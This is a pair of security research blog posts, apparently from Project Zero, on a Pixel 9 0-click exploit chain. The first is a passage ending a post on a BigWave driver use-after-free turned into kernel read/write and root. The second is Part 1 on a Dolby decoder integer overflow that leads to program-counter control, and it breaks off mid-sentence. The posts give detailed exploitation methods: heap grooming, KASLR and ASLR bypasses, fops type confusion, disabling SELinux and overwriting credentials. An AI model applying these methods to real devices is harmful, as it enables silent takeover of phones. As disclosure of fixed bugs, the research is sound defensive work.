The first bug I found was a duplicate that was originally reported in February of 2024 but remained unfixed at the time of re-discovery in June of 2025, over a year later, despite the bugfix being a transposition of two lines of code. The second bug presented a really fascinating bug-class that is analogous to the double-free kmalloc exploitation primitive - but with a different linked list entirely. However it was the third bug I discovered that created the nicest exploitation primitive. Fixes were made available for all three bugs on January 5, 2026.
The Nicest Bug
Every time the
/dev/bigwavedevice is opened, the driver allocates a new kernel struct calledinstwhich is stored in theprivate_datafield of thefd. Within theinstis a sub-struct calledjob, which tracks the register values and status associated with an individual invocation of the BigWave hardware to perform a task. In order to submit some work to the bigo hardware, a process uses the ioctlBIGO_IOCX_PROCESS, which fetches Bigwave register values from the ioctl caller in AP userland, and places thejobon a queue that gets picked up and used by a separate thread, the bigo worker thread. That means that an object whose lifetime is inherently bound to a file descriptor is transiently accessed on a separate kernel thread that isn’t explicitly synced to the existence of that file descriptor. DuringBIGO_IOCX_PROCESSioctl handling, after submitting ajobto get executed onbigo_worker_thread, the ioctl call enterswait_for_completion_timeoutwith a timeout of 16 seconds waiting forbigo_worker_threadto complete the job. After those 16 seconds, ifbigo_worker_threadhas not signaled job completion, the timeout period ends and the ioctl dequeues thejobfrom the priority queue. However, if a sufficient number of previous jobs were stacked onto thebigo_worker_thread, it is possible thatbigo_worker_threadwas so delayed that it has only just dequeued and is concurrently processing the veryjobthat the ioctl has considered to have timed out and is trying to dequeue. The syscall context in this case simply returns back to userland, and if at this point userland closes thefdassociated with the BigWave instance, theinst(and thusly thejob) is destroyed whilebigo_worker_threadcontinues to reference thejob.The highlights indicate any accesses to the UAF’d object:
static int bigo_worker_thread(void *data) { ... while(1) { rc = wait_event_timeout(core->worker, dequeue_prioq(core, &job, &should_stop), msecs_to_jiffies(BIGO_IDLE_TIMEOUT_MS)); //The job is fetched from the queue ... inst = container_of(job, struct bigo_inst, job); //The job is an inline struct inside of the inst which gets UAF'd ... rc = bigo_run_job(core, job); ... _job_ ->status = rc; complete(&_inst_ ->job_comp); } return 0; } ... static int bigo_run_job(struct bigo_core *core, struct bigo_job *job) { ... inst = container_of(job, struct bigo_inst, job); bigo_bypass_ssmt_pid(core, inst->is_decoder_usage); bigo_push_regs(core, job->regs); //The register values of the bigwave processor are set (defined by userland) bigo_core_enable(core); ret = wait_for_completion_timeout(&core->frame_done, msecs_to_jiffies(core->debugfs.timeout)); //pause for 1 second ... //At this point inst/job have been freed bigo_pull_regs(core, _job_ ->regs); //A pointer is taken directly from the freed object *(u32 *)(_job_ ->regs + BIGO_REG_STAT) = status; if (rc || ret) rc = -ETIMEDOUT; return rc; } void bigo_pull_regs(struct bigo_core *core, void *regs) { memcpy_fromio(regs, core->base, core->regs_size); //And the current register values of the bigwave processor are written to that location }By spraying attacker-controlled
kmallocallocations (for example via Unix Domain Socket messages) we can control the underlying UAF pointerjob->regs, so we can control the destination of our write. Additionally since we set the registers at the beginning of execution, by setting the registers in such a way that the BigWave processor does not execute at all, we can ensure that the end register state is nearly identical to the original register state - hence we can control what is written as well. And just like that, we have a half decent 2144-byte arbitrary write! And all without leaking the KASLR slide!
Defeating KASLR (by doing nothing at all)
Exploiting this issue with KASLR enabled would normally involve reallocating some other object over the bigo
instwith a pointer at the location ofinst->job.regs, leading to memory corruption of the object pointed to by that overlapped pointer. That would require finding some allocatable object with a pointer at that location, and also finding a way to take advantage of being able to overwrite the sub-object. Finding such an object is difficult but not impossible, especially if you consider cross-cache attacks. It is, however, quite tedious and is not really my idea of a fun time. Thankfully I found a much simpler strategy which essentially allows the generic bypass of KASLR on Pixel in its entirety, the details of which you can read about in my previous blog post. The end-result of that sidequest is the discovery that instead of needing to leak the KASLR base, you can just use0xffffff8000010000instead, particularly when it comes to overwriting .data in the kernel. This dramatically simplifies the exploit, and substantially improves the exploit’s potential reliability.Creating an arbitrary read/write
At this point, I have a mostly-arbitrary write primitive anywhere in kernel .data - I have an aliased location for, and can modify, any kernel globals I want. However the
completecall at the end of thebigo_worker_threadjob execution loop serves to complicate exploitation a little bit.completecallsswake_up_lockedwhich performs a set of list operations on alist_headnode inside of the bigoinst:static inline int list_empty(const struct list_head *head) { return READ_ONCE(head->next) == head; } void swake_up_locked(struct swait_queue_head *q) //The q is located at &inst->job_comp.wait (so attacker controlled) { struct swait_queue *curr; if (list_empty(&q->task_list)) return; curr = list_first_entry(&q->task_list, typeof(*curr), task_list); wake_up_process(curr->task); list_del_init(&curr->task_list); }While the first
list_emptycall would be the simplest to forge, it would also require knowing the location of theinstin kernel memory asqis an inline struct inside ofinst. Unfortunately, our KASLR bypass does not give us this, nor is it particularly easy to acquire, as theinstis in kernel heap, not kernel .data. That means we need to instead forge a valid list entry for theqto point to as well as know the location of a task to pass towake_up_process(). Finally we need to actually forge enough of a list to survive alist_del_initon an entry in theq->task_list, which involves list nodes, and second list nodes that point to the first list node. This might sound quite difficult to forge given the limitation we’ve previously noted about our KASLR bypass, but in fact, it’s not so bad, since our arbitrary write has already happened by this point - so we know the location of memory that we control somewhere in kernel .data. This means we can forge arbitrary list nodes within that space in .data, and we can place pointers to those future forged list nodes in the original heap spray we use to replace theinst. We ALSO know the location of a single task struct in the kernel virtual address space - theinittask!init’s task struct is in the kernel .data, so we can reference it through the linear map. A spuriouswake_up_processon theinit_taskwill be entirely inconsequential while avoiding a crash. You can see the code to set up these linked list nodes insetup_linked_listin the exploit.With that roadblock resolved, it’s time to figure out what in .data to target with our arbitrary write. Our goal is to change our unreliable arbitrary write of 2144 bytes to a reliable arbitrary read/write that causes significantly less collateral damage to the memory around it. I decided to try reimplementing the strategy I reversed from an ITW exploit a couple years ago. This technique involves creating a type-confusion by replacing some of the VFS/fops handlers in the
ashmem_miscdata structure with other VFS handlers for other file types. In fact, because of CFI you cannot replace the handler function pointers with pointers to just any location in the kernel .text. You must replace the VFS handlers with other VFS handlers. Rather conveniently however, I can use configfs VFS handlers for my exploit, just like the ITW exploit. The final layout of the fops table andprivate_dataof thestruct filelook like this:
The fops handlers in green will access the
private_datastructure as astructashmem_area, orasma, while the fops handlers in yellow access the sameprivate_datastructure as aconfigfsbuffer. For theconfigfsfops handlers, the memory pointed to bypagewill be accessed - that is where we will want our arbitrary read/write to read or write. We will set our target using theASHMEM_SET_NAMEioctl.One additional complication however, is that the linear mapping of the kernel .text is not executable, so I can’t use .text region linear map addresses to the VFS handlers when forging my
ashmem_miscdata structure. In practice, it’s not particularly difficult to leak the actual KASLR slide. Before targetingashmem_misc, I first use my arbitrary write to target thesel_fs_typeobject in the kernel .data. This structure has a string, name, that is printed when reading/proc/self/mounts. By replacing that string pointer using my arbitrary write, and then reading/proc/self/mounts, I can turn my unreliable arbitrary write into an arbitrary read instead! Using this arbitrary read, I can read theashmem_fopsstructure (also through the linear map) which gives me pointers at an offset from the kernel base, allowing me to calculate the KASLR slide.I then perform my arbitrary write again to overwrite the
ashmem_miscstructure with a pointer to a new forgedashmem_fopstable that I construct at the same time - such is the perk of overwriting far more data than I need.However, the astute among you may have realized that this massive 2144 byte arbitrary write has a major drawback too, as such a large write will clobber all of the data surrounding whatever I’m actually targeting with the write - this could lead to all sorts of extraneous crashes and kernel panics. In practice, spurious crashing can occur, but the phone is surprisingly quite stable. My experience was that it seemed to crash upon toggling the wifi on/off - but otherwise the phone seems to work mostly fine.
Once the forged
ashmem_miscstructure has been inserted, we now have a perfectly reliable arbitrary read/write, albeit with the phone extraneously crashing sometimes. Upon getting arb read/write, I set SELinux to permissive (just flip the flag in theselinux_statekernel object), fork off a new process, then use my arb read/write to point the new process’s task creds toinit_cred. At this point, I now have a process with root credentials, and SELinux disabled.Integrating into the Dolby exploit
Combining two exploits into one chain requires a fair amount of engineering effort from both exploits. The Dolby exploit will be delivering the Bigwave exploit as a shellcode payload, (patched into the process using
/proc/self/mem) so I need to convert my exploit to work as a binary blob. It also needs to be much smaller than my static compilation environment supported. The lowest hanging fruit was to remove the static libc requirement and have the exploit include wrappers for all the syscalls and libc functions it needs. When I set about to complete this rather tedious task, I realized that this is something an LLM would probably be quite good at. So instead of implementing the sycall wrappers myself, I simply copy-pasted my source code into Gemini and asked it to create the needed header file of syscall wrappers for me. Naturally the AI-generated header file caused many compilation errors (as it surely would have if I had tried to do it too). I took those compilation errors, gave them back to the same Gemini window, and asked it to amend the header file to resolve those errors. The amended header file caused gcc to emit whole new and exciting compilation failures - but the errors looked different than before, so I simply repeated the process. After 4 or 5 attempts, Gemini was able to generate a header file that not only compiled - it worked perfectly. This provides some insight into how attackers might be able to use (or more likely are already using) LLMs to make their exploit process more efficient.This effort results in a much smaller ELF than before (7 KB instead of 500 KB) but just an ELF is not enough - I need the generated blob to work if the dolby exploit simply starts executing from the top of the shellcode. The good news however is that my exploit can operate entirely without a linker - all that is necessary is to prepend a jump to the ELF that sets the PC to the entrypoint. I also include “-mcmodel=tiny -fPIC -pie” in the gcc arguments so that the generated code will work agnostic to the shellcode’s location or alignment in memory.
Finalizing the exploit
Kernel arbitrary read/write is motivating enough as a security researcher to demonstrate the impact of the vulnerability, but it seemed incumbent to create some more accessible demo in order to demonstrate impact more broadly. I added code so that the exploit executed an included shell script, then wrote a shell script that took a picture and sent that picture back to an arbitrary IP address.
In the final part of this blog series, we will discuss what lessons we learned from this research.
-
🔗 Project Zero A 0-click exploit chain for the Pixel 9 Part 1: Decoding Dolby rss
Over the past few years, several AI-powered features have been added to mobile phones that allow users to better search and understand their messages. One effect of this change is increased 0-click attack surface, as efficient analysis often requires message media to be decoded before the message is opened by the user. One such feature is audio transcription. Incoming SMS and RCS audio attachments received by Google Messages are now automatically decoded with no user interaction. As a result, audio decoders are now in the 0-click attack surface of most Android phones.
I’ve spent a fair bit of time investigating these decoders, first reporting CVE-2025-49415 in the Monkey’s Audio codec on Samsung devices. Based on this research, the team reviewed the Dolby Unified Decoder, and Ivan Fratric and I reported CVE-2025-54957. This vulnerability is likely in the 0-click attack surface of most Android devices in use today. In parallel, Seth Jenkins investigated a driver accessible from the sandbox the decoder runs in on a Pixel 9, and reported CVE-2025-36934.
As I’ve shared this research, vendors as well as members of the security community have questioned whether such vulnerabilities are exploitable, as well as whether 0-click exploits are possible for all but the most well- resourced attackers in the modern Android Security environment. We were also asked whether code execution in the context of a media decoder is practically useful to an attacker and how platforms can reduce the risks such a capability presents to users.
To answer these questions, Project Zero wrote a 0-click exploit chain targeting the Pixel 9. We hope this research will help defenders better understand how these attacks work in the wild, the strengths and weaknesses of Android’s security features with regards to preventing such attacks, and the importance of remediating media and driver vulnerabilities on mobile devices.
The exploit will be detailed in three blog posts.
Part 1 of this series will describe how we exploited CVE-2025-54957 to gain arbitrary code execution in the mediacodec context of a Google Pixel 9.
Part 2 of this series will describe how we exploited CVE-2025-36934 to escalate privileges from mediacodec to kernel on this device.
Part 3 will discuss lessons learned and recommendations for preventing similar exploits on mobile devices.
The vulnerabilities discussed in these posts were fixed as of January 5, 2026.
The Dolby Unified Decoder
The Dolby Unified Decoder component (UDC) is a library that provides support for the Dolby Digital (DD) and Dolby Digital Plus (DD+) audio formats. These formats are also known as AC-3 and EAC-3 respectively. A public specification is available for these formats. The UDC is integrated into a variety of hardware and platforms, including Android, iOS, Windows and media streaming devices. It is shipped to most OEMs as a binary ‘blob’ with limited symbols, which is then statically linked into a shared library. On the Pixel 9, the UDC is integrated into
/vendor/lib64/libcodec2_soft_ddpdec.so.The Bug
DD+ audio is processed from a bitstream, which consists of independently decodable syncframes, each representing a series of audio samples. During normal operation, the UDC consecutively decodes each syncframe from the bitstream.
One element of a syncframe is the audio block which, according to the specification, can contain the following fields. A syncframe can contain up to 6 audio blocks.
Syntax | Number of bits
---|---
**skiple**| 1
if(skiple)|
**skipl**| 9
**skipfld**| 9 * 8
}|This means the decoder can copy up to 0x1FF (
skipl) bytes per audio block from the bitstream into a buffer we’ll call the ‘skip buffer’.The skip buffer contains data in a format called Extensible Metadata Delivery Format (EMDF). This format is synchronized, meaning that the UDC looks for a specific series of bytes in the skip buffer, then processes the data afterwards as EMDF. The EMDF in a single syncframe is called an ‘EMDF container’. This is represented in the specifications as:
Syntax | Number of bits
---|---
emdf_sync(){|
**syncword**| 16
**emdf_container_length**| 16
}|The EMDF syncword is ‘X8’.
An EMDF container is defined as follows:
Syntax | Number of bits
---|---
emdf_container() {|
**emdf_version**| 2
if (emdf_version == 3) {|
emdf_version += variable_bits(2)|
}|
**key_id**| 3
if (key_id == 7) {|
key_id += variable_bits(3)|
}|
while (**emdf_payload_id** != 0x0) {| 5
if (emdf_payload_id == 0x1F) {|
emdf_payload_id += variable_bits(5)|
}|
}|
emdf_payload_config()|
emdf_payload_size</b>|variable_bits(8)
for (i = 0; i < payload_size; i++) {|
**emdf_payload_byte**| 8
}|
emdf_protection()|
}|variable_bitsis defined as:Syntax | Number of bits
---|---
variable_bits (n_bits) {|
value = 0;|
do {|
value += **read**|n_bits
**read_more**| 1
if (read_more) {|
value <<= n_bits;|
value += (1<<n_bits);|
}|
}|
while (read_more);|
return value|
}|If you’ve spent time looking for vulnerabilities in this type of specification, a problem might already be apparent. There is no stated limit for the size of
emdf_payload_size, meanwhile the output ofvariable_bitscould be very large, essentially any numeric value.Indeed, this is the root of the problem Ivan Fratric found while analyzing the Android UDC binary. In pseudo-code, it reads the EMDF payload into a custom ‘evo’ heap as follows:
result = read_variable_bits(this, 8, &payload_length); if ( !result ) { if ( evo_heap ) { buffer = ddp_udc_int_evo_malloc(evo_heap, payload_length, param.extra_len); outstruct.buf = buffer; if ( !buffer ) return 2; if ( payload_length ) { index = 0; while ( !ddp_udc_int_evo_brw_read(this, 8, &byte_read) ) { outstruct.buf[index++] = byte_read; if ( index >= payload_length ) goto ERROR; } return 10; } }So, memory is allocated, then the bytes of the payload are copied into the allocated memory. How does this allocation work?
void ddp_udc_int_evo_malloc(heap *h, size_t alloc_size, size_t extra) { size_t total_size; unsigned __int8 *mem; total_size = alloc_size + extra; if ( alloc_size + extra < alloc_size ) return 0; if ( total_size % 8 ) total_size += (8 - total_size) % total_size; if ( total_size > heap->remaining ) return 0; mem = heap->curr_mem; heap->remaining -= total_size; heap->curr_mem += total_size; return mem; }The evo heap is a single slab, with a single tracking pointer that is incremented when memory is allocated. There is no way to free memory on the evo heap. It is only used to process EMDF payloads for a single syncframe (the specification provides no limit on the number of payloads a syncframe can contain, outside of limits on the size of the skip buffer), and once that frame is processed, the entire evo heap is cleared and re-used for the next frame, with no persistence between syncframes.
While
evo_mallocperforms a fair number of length checks on allocations, this check is flawed, as it lacks an integer overflow check:if ( total_size % 8 ) total_size += (8 - total_size) % total_size;If total allocation size on a 64-bit platform is between 0xFFFFFFFFFFFFFFF9 and 0xFFFFFFFFFFFFFFFF, the value of
total_sizewill wrap, leading to a small allocation, meanwhile, the loop that writes to the buffer uses the originalpayload_lengthas its bounds.Integer overflow bugs are often challenging to exploit because they perform very large writes, but this code has a feature that makes this not the case. Each byte that is written is read from the skip buffer using
ddp_udc_int_evo_brw_read, and that function checks read bounds based onemdf_container_length, which is also read from the skip buffer. If the read bounds check fails, the loop exits, and no more data is written to the buffer allocated byevo_malloc. This means that the size of the overflow is controllable, as are the values of the bytes written out of bounds, to the limit of the size ofskipl(0x1FF * 6 audio blocks).This is a powerful primitive that I will refer to as the ‘buffer overrun capability’ of this vulnerability. But if you look closely, this bug also contains a leak.
EMDF content is written to the skip buffer with length
skipl, but the EMDF container also has a size,emdf_container_length. What happens whenemdf_container_lengthis larger thanskipl?if ( skipflde && ... ) { int skip_copy_len = 0; for ( int block_num = 0; block_num < total_blocks; ++block_num ) { if ( skiple ) { ... for ( skip_copy_len; skip_copy_len < skipl; skip_copy_len++ ) { b = read_byte_from_syncframe(); skip_buffer[skip_copy_len] = b; } } } int i = 0; for (i = 0; i < skip_copy_len; i+=2 ) { int16_t word = skip_buffer[i] | skip_buffer[i+1]); if ( word == "X8" ) { has_syncword = 1; break; } } if ( has_syncword ) { … emdf_container_length = skip_buffer[i + 1] | ( skip_buffer[i] << 8); bit_reader.size = emdf_container_length; bit_reader.data = skip_buffer[i + 2]; } }So while the skip buffer data is written based on
skipl, the bit reader used to process the EMDF container has its length set toemdf_container_length. This means that EMDF data can be read outside of the initialized skip buffer. I will refer to this as the ‘leak capability’ of this vulnerability going forward.We didn’t report the leak capability is a separate vulnerability from CVE-2025-54957, as it doesn’t have a security impact independent of the bug. The skip buffer is initialized to all zeros when the decoder starts, and afterwards, only syncframe data (i.e. the contents of the media being processed) is written to it. So in normal circumstances, an attacker couldn’t use the leak capability to leak anything they don’t already know. Only when combined with the buffer overrun capability of the vulnerability, does the leak capability become useful.
Decoder Memory Layout
The next step in exploiting this bug was understanding what structures in memory it can overwrite. This required understanding the memory layout of the UDC. The UDC performs a total of four system heap allocations when decoding DD+ audio, all occurring when the decoder is created, before any syncframes are processed. These allocations are freed and re-allocated between processing each media file. This is fairly typical of media decoders, as system heap allocations have non-deterministic timing, which can cause lag when the media is played.
One buffer that is allocated is the ‘static buffer’. This buffer contains a large struct, which supports all the functionality of the decoder. The evo heap is part of this buffer. On Android, the size of the static buffer is 692855. Another buffer that is allocated is the ‘dynamic buffer’. This buffer is used as ‘scratch space’ for a variety of calculations, and is also the location of the skip buffer. It is 85827 bytes long. The other two allocations are for input parameters and output data, and aren’t relevant to this exploit.
The terms ‘static buffer’ and ‘dynamic buffer’ are somewhat confusing, as there are other static and dynamic buffers used by the decoder, and both buffers are dynamically allocated. However, these are the names used by Android when integrating the UDC. Throughout this post, the term ‘static buffer’ will always refer to the 692855-byte buffer allocated by the UDC on initialization, and the term ‘dynamic buffer’ will always refer to the 85827-byte buffer allocated by the UDC on initialization, and no other static or dynamic buffers.
The following diagram shows where the skip buffer and evo heap are located in relation to these buffers:
The evo heap is located at offset 0x61d28 in the static buffer, and immediately afterwards is the pointer used to write to the skip buffer when processing EMDF, which I will call the ‘skip pointer’. It points 0x1000 below the skip buffer, and 0x1000 is added to its value to calculate the address that skip data (skipfld) is written to each time a syncframe is processed.This means the vulnerability has the potential to overwrite a pointer that is later written to with attacker-controllable content, the skip data of the next syncframe. Unfortunately, this is not as simple as using the buffer overrun capability to overwrite the pointer, as the evo heap is 0x1f08 bytes long, and the maximum value of
skiplis 3066 (0xbfa = 0x1ff * 6 audio blocks), meaning that the value the skip pointer would be overwritten with is not immediately controllable by simply decoding an EMDF payload that contains the bug.This behavior is demonstrated by the original proof-of- concept attached to CVE-2025-54957. This file causes the buffer overrun to occur, but because the skip pointer is more than 3066 bytes away from the evo heap allocation that is overwritten, data is copied from outside the skip buffer. Since this memory is always zero, the skip pointer is overwritten with 0, and a null pointer crash occurs when the skip data from the next syncframe is written.
To get around this, the buffer overrun needs to be triggered on an evo heap allocation when the heap is partially filled. Fortunately, an EMDF container can contain multiple EMDF payloads, and parsing each payload allocates memory on the evo heap. Analyzing
ddp_udc_int_evo_parse_bitstream, the function that performs this parsing and allocation, the smallest possible payload consumes 19 bits from the skip buffer. Meanwhile, every EMDF payload processed causes 96 bytes to be allocated on the evo heap. This means it would take roughly 99 payloads to fill up the evo heap, which translates to 235 bytes of skip data. This is well within the available skip data space. Using this technique, it was possible to overwrite the skip pointer with a controllable absolute value, then write arbitrary data to it.Write what where?
While this is a useful primitive, its utility is limited by ASLR, as an attacker would need to know the absolute value of a pointer to write to, which is unlikely in a 0-click context. Another possibility is partially overwriting the skip pointer, for example, 0x7AAAAA00A0 could be overwritten to be 0x7AAAAA1234. Since the skip pointer originally points to the dynamic buffer, this allows most of the dynamic buffer to be overwritten. Unfortunately, the dynamic buffer is only used to store temporary numeric data and does not contain any pointers or other structures that would be helpful for exploitation, but there is one useful aspect of this primitive. Normally, only 3066 bytes of skip data can be written to the skip buffer, but it can allow an attacker to write more.
For example, imagine the following series of syncframes:
- Sets skip pointer to 0x7XXXXX4000
- Writes 3066 bytes of skip data to skip pointer
- Sets skip pointer to 0x7XXXXX3800
- Writes 0x800+ bytes of skip data to skip pointer
Now the length of the available data in the skip buffer is 3066 + 0x800, and this can be chained with more syncframes to write up to 0xFFFF bytes into the dynamic buffer. This isn’t on its own a path to exploitation, but it is a primitive that will become useful later. I will refer to it as WRITE DYNAMIC in future sections.
There is one subtlety that is important to notice. Why does syncframe 3 only move the skip pointer back 0x800 (2048) bytes when it could move it back 3066 bytes? This is because setting the skip pointer overwrites the data in the skip buffer. So syncframe 2 writes 3066 bytes, but syncframe 3 overwrites, for example, 200 bytes of that, then syncframe 4 needs to write 0x800+200 bytes to ‘fix’ the overwritten data. So to accurately write a long buffer to the dynamic buffer, the memory overwritten by each syncframe needs to overlap. But never fear, with enough syncframes, it is possible to fill almost the entire dynamic buffer with attacker controlled data. It is also possible to set the skip pointer to process the written data without modifying it by setting the skip pointer to the start of the data to be processed in one syncframe, then processing a second syncframe with
skiplof 2, which will only write the syncword (‘X8’). The skip data will then be processed based on theemdf_container_lengthalready written.Regardless, the WRITE DYNAMIC primitive was clearly not sufficient for exploitation, so I decided to take a step back and figure out what memory I could overwrite to gain code execution, even if I didn’t have an immediate strategy for overwriting it. Analyzing the static buffer, I learned that my options were fairly limited. There are only two function pointers in the entire static buffer, called very frequently by the function
DLB_CLqmf_analysisL, at offsets 0x8a410 and 0x8a438. This appears to be the only dynamically allocated memory used by the UDC that contains any function pointers.Note that 0x8a410 and 0x8a438 are absolutely gargantuan offsets. They are more than 0x20000 bytes from the end of the evo heap, at address 0x63c30. A typical exploitation approach might be to directly overflow the heap to overwrite one of these pointers, but this offset is far too large. Even if the above primitive was used to fill the entire dynamic buffer (writable length 0xFFFF) with EMDF container data, it would still not be enough data to overwrite these pointers.
Extending the evo heap
A different approach was needed, so I revisited the static buffer, looking for other fields I could overflow near the end of the evo_heap. One looked interesting:
The
heap_lenis used to set the allocation limit of the evo heap during the processing of each syncframe. If it could be overwritten, it would be possible for the evo heap to allocate memory outside of its original bounds.This was a very promising possibility, as it had the potential to enable a primitive that would allow relative writes within the static buffer. For example, if I overwrote the heap length with a very large value, then allocated 0x286e8 bytes, since the evo heap starts at offset 0x61d28 and I am able to allocate and write to evo heap memory, would I then be able to write to offset 0x61d28 + 0x286e8 = 0x8a410?Of course, this is still limited by the available size of the skip data, which is now 0xFFFF due to the WRITE DYNAMIC primitive. But since payloads use skip buffer memory at a ratio of 19 bits to 90 bytes, the function pointer could theoretically be overwritten using 0x286e8 / 90 * 19 / 8 = ~ 0xa000 bytes of skip data, which is smaller than the available 0xFFFF bytes.
Overwriting
heap_lenpresents a challenge, though, as a write that reaches it will also overwrite the skip pointer, and if the skip pointer is invalid, it will cause a crash before the new value ofheap_lenis processed. One way to get around this would be to know the absolute value of a writable pointer and include it in the data that overwrites the memory, but without an information leak, this isn’t practical on a Pixel. Another would be if there was a valid pointer in the dynamic buffer, as using the leak capability, it would be possible to embed it in the skip data for a frame and use it for the overwrite, but the dynamic buffer only contains numeric data.Then I realized that the dynamic buffer does contain pointers. Not in the allocated portion, but in the contiguous metadata included in the allocation by Android’s scudo allocator. Inspecting the dynamic buffer in a debugger, the pointer always has the address format 0x000000XXXXXXX0A0. The offset of 0xa0 leaves space for the heap header.
The heap header of the dynamic buffer is as follows:
The memory between offset 0x00 and 0x50 is unused by the scudo heap because this is a secondary (large) allocation, but unfortunately, there is a guard page before the header, and 0x50 bytes is not enough space for the EMDF container needed to overwrite the skip pointer and heap length, so I investigated ways to increase the unused memory between the guard page and allocation header. I discovered:
- If a secondary allocation is freed, and a chunk that is up to 0x2000 bytes smaller is then allocated, the freed chunk will be reallocated to satisfy the request. More importantly, the heap header will be shifted upwards. For example, if a heap chunk of size 0x17000 is allocated at 0x7f00000000 then freed, and then an allocation of size 0x15000 is made, then the chunk will be reused, but the heap header will now be at 0x7f00002000.
- When a secondary chunk is freed, scudo determines the size entirely based on the “curr chunk len” field shown above
It’s also important to note that the dynamic and static buffers are such large allocations with such unusual sizes that scudo always allocates them in the same location in a specific process, allocating the memory when the decoder is initialized and freeing it when it is uninitialized, as once the chunks are created by the heap, they are the only suitable existing chunks to fulfill an allocation request of that size. (Note that the UDC runs in a separate process from other codecs on Android.)
Putting this all together, it is possible to point the skip pointer to the ‘curr chunk len’ field of the dynamic buffer’s header, then overwrite it, so the chunk’s length is 0x17000 instead of 0x15000. Then, when the decoder is reset (i.e. when a new file is played), the buffer will be reallocated, with an extra 0x2000 bytes of writable space before the heap header. This means the exploit will require decoding multiple files, but that isn’t a problem when exploiting this bug via transcription, as multiple audio attachments to a single message are decoded in sequence.
There is a small ASLR problem with this step. As mentioned above, the dynamic buffer is allocated at a pointer with the format 0x000000XXXXXXY0a0, with X and Y being bits randomized by ASLR. The desired value to be written to is 0x000000XXXXXXY065. But remember, the skip buffer is actually at an offset of 0x1000 from the address the skip pointer references. So to perform the write, the skip pointer needs to be set to 0x000000XXXXXXZ065, where Z is one less than Y. This means the exploit needs to overwrite the nibble Y, and therefore know the value of Y, which is randomized by ASLR.
I did an experiment on a Pixel to see how this value was randomized and it seemed fairly even.
So the only option here is to guess this value, which means this exploit would work 1 out of every 16 times. This isn’t prohibitive, though, as an attacker could send the exploit repeatedly until it works, and if the heap nibble value is wrong, the decoding process crashes and respawns after roughly three seconds, which means the exploit would succeed on average in 24 seconds.
My exploit assumes the nibble value is 3. With this, and the shifting of the scudo heap header described above, it’s possible to insert an EMDF container before the heap header and use the leak capability of the bug to copy it over the skip pointer, then continue the copy to set the heap length. The heap length ends up being overwritten by audio data from early in the dynamic buffer (bit allocation pointers to be specific), which for the syncframe I used, is a value of 0x77007700770077.
Controlling PC
Now everything is ready to go: we can write and EMDF container with roughly 2070 EMDF payloads into the dynamic buffer, and when its processed ~0x28000 bytes of the evo heap gets allocated, then the final payload overwrites the function pointer at 0x8a410. Unfortunately, this didn’t work.
It turns out that there are some other fields after the heap length in the static buffer.
To understand what these are, and why they are causing problems, we need to look more closely at how evo memory is allocated when EMDF payloads are processed. In highly simplified pseudocode, it works something like this.
int num_payloads = 0; while(true){ int error = evo_parse_payload_id(&reader, &payload_id); if(payload_id == 0 || error) break; num_payloads++; error = evo_parse_payload(reader, payload_id, 0, 0, &payload, 0); //allocates no memory if(error) break; } void** payload_array = evo_malloc(evo_heap, 8 * num_payloads, 8 * _array_extra_); for (int i = 0; i < num_payload; i++){ payload_array[i] = evo_alloc(88, 0); } reader.seek(0); for (int i = 0; i < num_payload; i++){ int error = evo_parse_payload_id(&reader, &payload_id); if(payload_id == 0 || error) break; error = evo_parse_payload(reader, payload_id, evo_heap, 0, payload_array[i], 0); if(error) break; }Within the second call to
evo_parse_payload, a single allocation (the same one which can overflow when the bug occurs) is performed as follows:void* payload_mem = evo_alloc(payload_size, _payload_extra_);On a high level, this code counts the number of EMDF payloads, then allocates an array of that size to hold pointers to a struct for each payload, then allocates a struct to represent each payload, and sets the corresponding pointer in the array to the struct allocation, then reads each EMDF object into its payload struct, optionally allocating payload memory if it contains payload bytes.
Two fields from the static buffer are marked in bold in the code above.
array_extraandpayload_extraare both integrator-configurable parameters that cause specific calls toevo_allocto allocate extra memory.So why does this cause my attempt to overwrite the function pointer in the static buffer to fail? When the decoder processes the EMDF container with a large number of payloads, it starts to allocate memory outside of the evo heap, because the heap length was overwritten with a very large size. The first evo heap memory allocated is the
payload_array, an array of pointers that are later set to 88-byte evo heap allocations, one for each payload. With 2070 EMDF containers, this array is very large, 0x40B0 bytes. It overlapspayload_extra, and many other fields in the static buffer, setting them to pointer values. For fields that are interpreted as integers, likepayload_extra, the end result is that they now contain numeric values that are very large.Soon after
payload_extrais overwritten,evo_parse_payloadis called, which attempts the allocation:void* payload_mem = evo_alloc(payload_size, payload_extra);The allocation size is calculated by adding
payload_size + payload_extra(with an integer overflow check) before the buggy addition of alignment padding that leads to the vulnerability padding occurs. Since pointers are tagged on Android, this will end up being something like:total_size = payload_size + 0xB400007**XXXXXXXXX** ;Meanwhile, the heap length was overwritten to be 0x77007700770077, which is always smaller than
total_size, so this allocation fails. Even worse, the overwrittenpayload_extrapersists across syncframes, meaning that nopayload_memallocation will ever succeed again. This prevents the bug from ever triggering again, as it requires a successful allocation, so there is no possibility of correcting these values in the static buffer.But maybe it isn’t necessary to ever trigger the bug again, as the skip pointer is one of the many fields that gets overwritten by the huge
payload_arrayallocation, causing it to point into the static buffer, above the evo heap. I’m going to skip over some details here, because I ended up not using this strategy in the final exploit, but by writing data to the altered skip pointer, it was possible to overwrite the function pointer, which demonstrated that this vulnerability could set the program counter!Non-contiguous Overwrites
Controlling the PC showed this bug has excellent exploitability, but the above strategy had a serious downside: it prevented the bug from being triggered again, so I could only perform one overwrite, which would make achieving shellcode execution challenging. So my next step was to find a way to perform multiple non-contiguous writes to the static buffer.
When setting the PC, the unavoidable corruption of
payload_extraprevented future overwrites, but I eventually realized that I could use the ability to set this field to my advantage.The layout of allocations on the evo heap is as follows:
If an EMDF container contained two EMDF payloads, the data for the second payload would be allocated at
num_payloads× 96 +payload_1_size+payload_extra. This allows payload_extra bytes to be allocated in the static buffer, but not overwritten by the payload. Since the length and contents of payload data is controllable by the attacker, it would be possible to write basically any data at any relative location in the static buffer if I could find some way to overwritepayload_extrawith controlled data. The fact thatpayload_1_sizeis also set from syncframe data makes this even more convenient. Since all the writes this exploit requires are fairly close to each other in memory,payload_extraonly needs to be written once, soheap_base+num_payloads× 96 +payload_1_size+payload_extrais equal to theX0parameter ofDLB_CLqmf_analysisL(more on why this is a good choice later.) Then, by modifying the size ofpayload_1_size, the address of individual writes can be shifted by that many bytes. For example, ifpayload_1_sizeis 14 × 8, the function pointer in the static buffer discussed above will be overwritten.Overwriting
payload_extraUnfortunately, the method used for overwriting the heap length is not sufficient to overwrite
